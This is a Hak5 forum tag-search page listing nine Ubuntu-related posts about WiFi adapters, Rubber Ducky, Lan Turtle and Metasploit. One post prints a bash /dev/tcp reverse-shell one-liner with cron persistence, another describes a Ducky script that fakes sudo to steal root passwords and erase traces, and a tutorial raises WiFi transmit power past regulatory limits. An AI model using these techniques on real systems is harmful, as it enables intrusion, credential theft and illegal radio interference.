Jump to content
Hak5 Forums

Search the Community

Showing results for tags 'ubuntu'.

More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • WiFi Pineapple / Jasager
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • Mark V
    • Mark IV
    • Pineapple Modules
    • WiFi Pineapple University
    • Mark I, II, III
  • Active Projects
    • Bash Bunny
    • Packet Squirrel
    • Lan Turtle
    • USB Rubber Ducky
    • SDR - Software Defined Radio
    • Community Projects
  • Hak5 Shows
    • Hak5
    • HakTip
    • Metasploit Minute
    • Threatwire
  • Community
    • Forums and Wiki
    • #Hak5
  • Other Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Found 9 results

  1. Hi all, I'm a newbie to Hak5 Forums, so if this thread is in the wrong category, it would be great if the admins could move it to the correct category. Most of you are probably using 'BO' as the region for 'iw' on Linux. This allows the WiFi interface to operate at 30dBm (1 Watt) at max. However, if you're like me and have a device that is capable of transmitting over 1W (I have Alpha Network AWUS036NH - 2W), you might be interested in increasing the TX power beyond 30dBm. By default, selecting 'BO' as the region only allows the device to operate at a maximum of 30dBm. I tested this on my Raspberry Pi 3, Model B running Kali Linux (with the kali-linux-full metapackage). *** If you are lazy and don't want to follow these manual steps below, I made two bash scripts that will work on Kali Linux and Ubuntu : https://github.com/hiruna/wifi-txpower-unlocker Working directory: /root Steps: 1. Update and upgrade apt-get update apt-get upgrade 2. Install dependencies to compile apt-get install pkg-config libnl-3-dev libgcrypt11-dev libnl-genl-3-dev build-essential 3. Download the latest Central Regulatory Domain Agent (CRDA) and Wireless Regulatory Database I downloaded crda-3.18.tar.xz and wireless-regdb-2017.03.07.tar.xz wget https://www.kernel.org/pub/software/network/crda/crda-3.18.tar.xz wget https://www.kernel.org/pub/software/network/wireless-regdb/wireless-regdb-2017.03.07.tar.xz 4. Unzip the downloaded files tar xvJf crda-3.18.tar.xz tar xvJf wireless-regdb-2017.03.07.tar.xz 5. Navigate into wireless-regdb-2017.03.07 cd wireless-regdb-2017.03.07 6. Open db.txt and locate the region BO section nano db.txt You will see something like this: country BO: DFS-JP (2402 - 2482 @ 40), (30) (5250 - 5330 @ 80), (30), DFS (5735 - 5835 @ 80), (30) The number in the second set of brackets (for each frequency) is the txpower. Since I'm using the 2.4Ghz and want a txpower of 2W (~33dBm), I changed the 20 to 33, and saved the file: country BO: DFS-JP (2402 - 2482 @ 40), (33) (5250 - 5330 @ 80), (30), DFS (5735 - 5835 @ 80), (30) I also noticed that region AU allows 36dBm for 2.4Ghz, so you could just continue without modifying the region BO: country AU: DFS-ETSI (2400 - 2483.5 @ 40), (36) (5150 - 5250 @ 80), (23), NO-OUTDOOR, AUTO-BW (5250 - 5350 @ 80), (20), NO-OUTDOOR, AUTO-BW, DFS (5470 - 5600 @ 80), (27), DFS (5650 - 5730 @ 80), (27), DFS (5730 - 5850 @ 80), (36) (57000 - 66000 @ 2160), (43), NO-OUTDOOR However, I checked with Kali Linux (without compiling and changing the regulatory.bin) and it showed that max txpower was only 20dBm: country AU: DFS-ETSI (2402 - 2482 @ 40), (N/A, 20), (N/A) (5170 - 5250 @ 80), (N/A, 17), (N/A), AUTO-BW (5250 - 5330 @ 80), (N/A, 24), (0 ms), DFS, AUTO-BW (5490 - 5710 @ 160), (N/A, 24), (0 ms), DFS (5735 - 5835 @ 80), (N/A, 30), (N/A) So I'm assuming Kali Linux is using an old regulatory.bin and legislation in AU has changed. 7. Compile make 8. Backup up your old regulatory.bin file and move the new file into /lib/crda mv /lib/crda/regulatory.bin /lib/crda/regulatory.bin.old mv regulatory.bin /lib/crda As mentioned in https://wireless.wiki.kernel.org/en/developers/regulatory/crda and https://wireless.wiki.kernel.org/en/developers/regulatory/wireless-regdb, we need to include RSA public keys in crda-3.18/pubkeys. I noticed that there are already 2 .pem files in crda-3.18/pubkeys: sforshee.key.pub.pem linville.key.pub.pem 9. Copy root.key.pub.pem into crda-3.18/pubkeys. I also copied sforshee.key.pub.pem from wireless-regdb-2017.03.07 as it was newer: cp root.key.pub.pem ../crda-3.18/pubkeys/ cp sforshee.key.pub.pem ../crda-3.18/pubkeys/ I found that there are two other pubkeys located at /lib/crda : -rw-r--r-- 1 root root 451 Jan 18 12:58 benh@debian.org.key.pub.pem -rw-r--r-- 1 root root 451 Jan 18 12:58 linville.key.pub.pem -rw-r--r-- 1 root root 451 Jan 18 12:58 sforshee.key.pub.pem So I copied them too (wasn't too sure whether I needed to copy them): cp /lib/crda/pubkeys/benh\@debian.org.key.pub.pem ../crda-3.18/pubkeys/ cp /lib/crda/pubkeys/linville.key.pub.pem ../crda-3.18/pubkeys/ 10. Navigate into crda-3.18 and open the Makefile cd ../crda-3.18 nano Makefile In Kali Linux, crda is located at /lib/crda instead of /usr/bin/crda, so in the file change the 3rd line REG_BIN?=/usr/lib/crda/regulatory.bin to REG_BIN?=/lib/crda/regulatory.bin : REG_BIN?=/lib/crda/regulatory.bin 11. In the Makefile, find the line CFLAGS += -std=gnu99 -Wall -Werror -pedantic and remove the -Werror option (I couldn't compile without changing it as it treats warnings as errors): CFLAGS += -std=gnu99 -Wall -pedantic 12. Compile make clean make make install That's it! I rebooted my Raspberry Pi after compiling. reboot 13. Now let's change the region and set the txpower to 33dBm: ifconfig wlan1 down iw reg set BO iwconfig wlan1 txpower 33 ifconfig wlan1 up
  2. I would just like to preface by saying that I won't be here to read or respond to comments. I apologize for that, but I am spending as much time as I can focusing on research and learning everything I can. This is a time I would consider to be my intellectual prime and I really want to use this time as best I can in that regard, so I hope you can understand why I won't be actively engaging as a user in general. https://medium.com/@ViGrey/phishing-for-root-using-shell-functions-against-mac-and-linux-2b1b7edbb9a9 This is a script that pretends to be sudo and /usr/bin/sudo, acts like the password prompt, steals the password and deletes traces of itself, including the shell history of running the script itself. The specific ducky script in this post is for Ubuntu with Unity, but it could easily be tweaked to work with other desktops, distros, and even Mac OS X. The idea for this came when I was in the early stages of the research project I'm currently working on involving U2F security tokens (I'll make a post here about that later after I get a POC and blog post up). After testing out some commands for the project, the thought "Could I alias sudo?" came to mind and I decided to try it. Sure enough, it worked flawlessly. I then checked to see if I could alias sudo and call sudo at the end, essentially injecting commands into sudo. That worked flawlessly as well. Figuring these things out opened more questions and I ended up in a rabbit hole thinking about what I could do with it. After getting some other work done, I decided to start working on the ideas about 2 or 3 days ago after figuring out the same can be said about shell functions as aliases and came up with this. The ducky script is in the blog post, but also at https://gist.github.com/ViGrey/a988c76c87898a2156da7724c57f16b4#file-rootphisher-ducky. Go ahead and tinker with it; make it better. I know there are probably better ways to handle some edge cases that can arise, but I leave that as a exercise for you all and possibly myself in the future to look at. I just had fun working on this. Apologies for any confusing parts or spelling errors in the blog post. I wrote that post in a bit of a rush so I could get back to my current research project. Have fun with it!
  3. Hello, I just got my Rubber Ducky and started toying with it, but can't get the desired outcome on my Ubuntu Xenial machine. System: Ubuntu 16.04 Xenial 4.4.0-70-generic Compile Steps: Deleted inject.bin, ran java -jar /path/to/duckencode.jar -i hello.txt, created an inject.bin. Script: REM Description: Open "Run a Command", run gnome-terminal DELAY 3000 ALT F2 DELAY 1500 STRING gnome-terminal DELAY 750 STRING echo Hello World ENTER Outcome: The ALT F2 part of the script not working, the delays, the string inputs and enter keys are working. Test: Opened gEdit, focused the window and replayed payload. Output: gnome-terminal echo Hello World Expectation: Gnome Terminal to open, focused, and write echo Hello World then return key. Alternative: Tried CTRL ALT t, without STRING gnome-terminal ENTER and does not work either. Alt Script: REM Description: Open Terminal DELAY 3000 CTRL ALT t DELAY 1500 STRING echo Hello World ENTER Test: Opened gEdit, focused the window and replayed payload. Output: echo Hello World Expectation: Gnome Terminal to open, focused, and write echo Hello World then return key. No Gnome Terminal opened, just did STRING echo Hello World ENTER in gEdit. Is there something I am doing wrong? Is there something I should know? Any help or suggestions would be appreciated. I will be switching over to Windows tomorrow, but just thought this was odd and worth mentioning for Ubuntu 16.04.
  4. Bought an alfa awus036nh and loaded up ubuntu 16.04 lts on a thinkpad 420. BUT the thinkpad wireless gets me a better signal than the alfa??? I noted the power readings from fluxion using both wireless adapters in the same location. ALSO I can't seem to up the TX on the alfa at all. is there a problem with Ubuntu drivers and this usb wireless adapter? I thought it was supposed to be pretty well respected for hacking? I found a few discussions on this topic that lead me to believe that the current standard drivers in ubuntu 16.04 weren't the correct ones BUT they all seem to disagree on which to install. thanks for any pointers.
  5. Dropping Connection Sharing

    So I am running the BB script to bring my bunny online via Ubuntu 16 server. I can run it and gain access, but after like 10 mins it drops the connection and I loose the shared interface in my networking setup. I can ssh fine, and then after 10 mins I lose the sessions and it drops the connection. I'm not running any network manager to be interrupting the connection, has anyone else seen this?
  6. Permission Denied (publickey)

    I am a complete noob at this, so I could be doing something completely wrong. Just got the Lan turtle today. Plugged it in with a phone charger meeting minimium power requirements and connected it to a PC with an OTG ethernet-to-USB adapter. Had to setup the network connection manually (on Ubuntu 16.10) with: IP -, Netmask -, Gateway -, DNS Servers - and After that, I check the connection with ifconfig and everything appears to be OK, so I finally tried connecting to the Lan Turtle. :$ ssh root@ Permission denied (publickey). I have setup openssh on a few of my PCs for ssh-key authentication only, but this the first time using the Lan Turtle. Also realised I cannot browse on the internet while it is connected, even with wifi and another wired connection available. I have searched around to see if there is a fix for this, but I canot find anything.
  7. Metasploit Error

    Whenever I type the following: pc@pc-eME732Z ~/Downloads/metasploit-framework-master $ msfconsole /var/lib/gems/2.3.0/gems/activesupport- `require': cannot load such file -- robots (LoadError) from /var/lib/gems/2.3.0/gems/activesupport- `block in require' from /var/lib/gems/2.3.0/gems/activesupport- `load_dependency' from /var/lib/gems/2.3.0/gems/activesupport- `require' from /opt/metasploit-framework/lib/metasploit/framework.rb:18:in `<top (required)>' from /opt/metasploit-framework/lib/metasploit/framework/database.rb:1:in `require' from /opt/metasploit-framework/lib/metasploit/framework/database.rb:1:in `<top (required)>' from /opt/metasploit-framework/lib/metasploit/framework/parsed_options/base.rb:17:in `require' from /opt/metasploit-framework/lib/metasploit/framework/parsed_options/base.rb:17:in `<top (required)>' from /opt/metasploit-framework/lib/metasploit/framework/parsed_options/console.rb:2:in `require' from /opt/metasploit-framework/lib/metasploit/framework/parsed_options/console.rb:2:in `<top (required)>' from /var/lib/gems/2.3.0/gems/activesupport- `require' from /var/lib/gems/2.3.0/gems/activesupport- `const_get' from /var/lib/gems/2.3.0/gems/activesupport- `block in constantize' from /var/lib/gems/2.3.0/gems/activesupport- `each' from /var/lib/gems/2.3.0/gems/activesupport- `inject' from /var/lib/gems/2.3.0/gems/activesupport- `constantize' from /var/lib/gems/2.3.0/gems/activesupport- `constantize' from /opt/metasploit-framework/lib/metasploit/framework/command/base.rb:73:in `parsed_options_class' from /opt/metasploit-framework/lib/metasploit/framework/command/base.rb:69:in `parsed_options' from /opt/metasploit-framework/lib/metasploit/framework/command/base.rb:47:in `require_environment!' from /opt/metasploit-framework/lib/metasploit/framework/command/base.rb:81:in `start' from /usr/local/bin/msfconsole:48:in `<main>' Please help !!! I use LInux Mint 32 bit
  8. Not totally sure what I'm doing. I started a reverse shell on my ubuntu machine. 0<&96-;exec 96<>/dev/tcp/;sh <&96 >&96 2>&96 I get a file descriptor error when I run the command but it opens a shell and I can interact with the target system (Ubuntu 16.04 Desktop). When I use cron_persistence from armitage it seems to work fine. When I reboot the target it just black screens and never runs desktop. It's funny. I had been hacked running Ubuntu about a week ago but I figured that the attacker had intentionally PDOSed my system. It was probably accidental. Anybody have any idea what's going on here? What am I doing wrong with the shell and what do I do to fix the issue on the target machine?
  9. lanturtle on Ubuntu

    So did the first update all ok, runs ok on my windows box, however I attached the turtle to a Ubuntu box and when i do ifconfig i dont see eth1, just my normal eth0. Any follow up how to make this thing work ? For some reason i am able to ping the lanturtle ip, but cant ssh into it (refuse connection) from my windows box. Help would be deeply appreciated Thanks guys